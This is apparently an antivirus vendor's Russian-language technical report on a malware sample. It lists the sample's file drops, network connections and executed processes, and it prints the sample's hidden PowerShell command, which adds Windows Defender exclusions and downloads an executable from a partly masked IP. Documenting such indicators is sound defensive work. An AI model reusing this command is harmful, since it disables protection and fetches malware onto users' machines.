Техническая информация
Вредоносные функции
Для затруднения выявления своего присутствия в системе
добавляет исключения антивируса:
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle hidden Add-MpPreference -ExclusionPath C:\Users;Add-MpPreference -ExclusionPath $env:ProgramFiles;cd C:\Users;Invoke-WebRequest 18#.#48.3.216/Ujkflzer45sc0 -OutFile Ujkflzer45sc0.e...
Изменения в файловой системе
Создает следующие файлы
- C:\users\public\music\setup.exe
- C:\users\public\music\ppmjkjjkgbgb.bat
- nul
- %TEMP%\fcinst-1041817e3188732c\setup.exe
Сетевая активность
Подключается к
- '34.##9.100.209':443
TCP
Другие
- '34.##9.100.209':443
Другое
Ищет следующие окна
- ClassName: 'EDIT' WindowName: ''
Создает и запускает на исполнение
- 'C:\users\public\music\setup.exe'
- '%TEMP%\fcinst-1041817e3188732c\setup.exe'
Запускает на исполнение
- '<SYSTEM32>\cmd.exe' /c ""C:\Users\Public\Music\ppmjkjjkgbgb.bat" "
- '<SYSTEM32>\net.exe' session
- '<SYSTEM32>\net1.exe' session
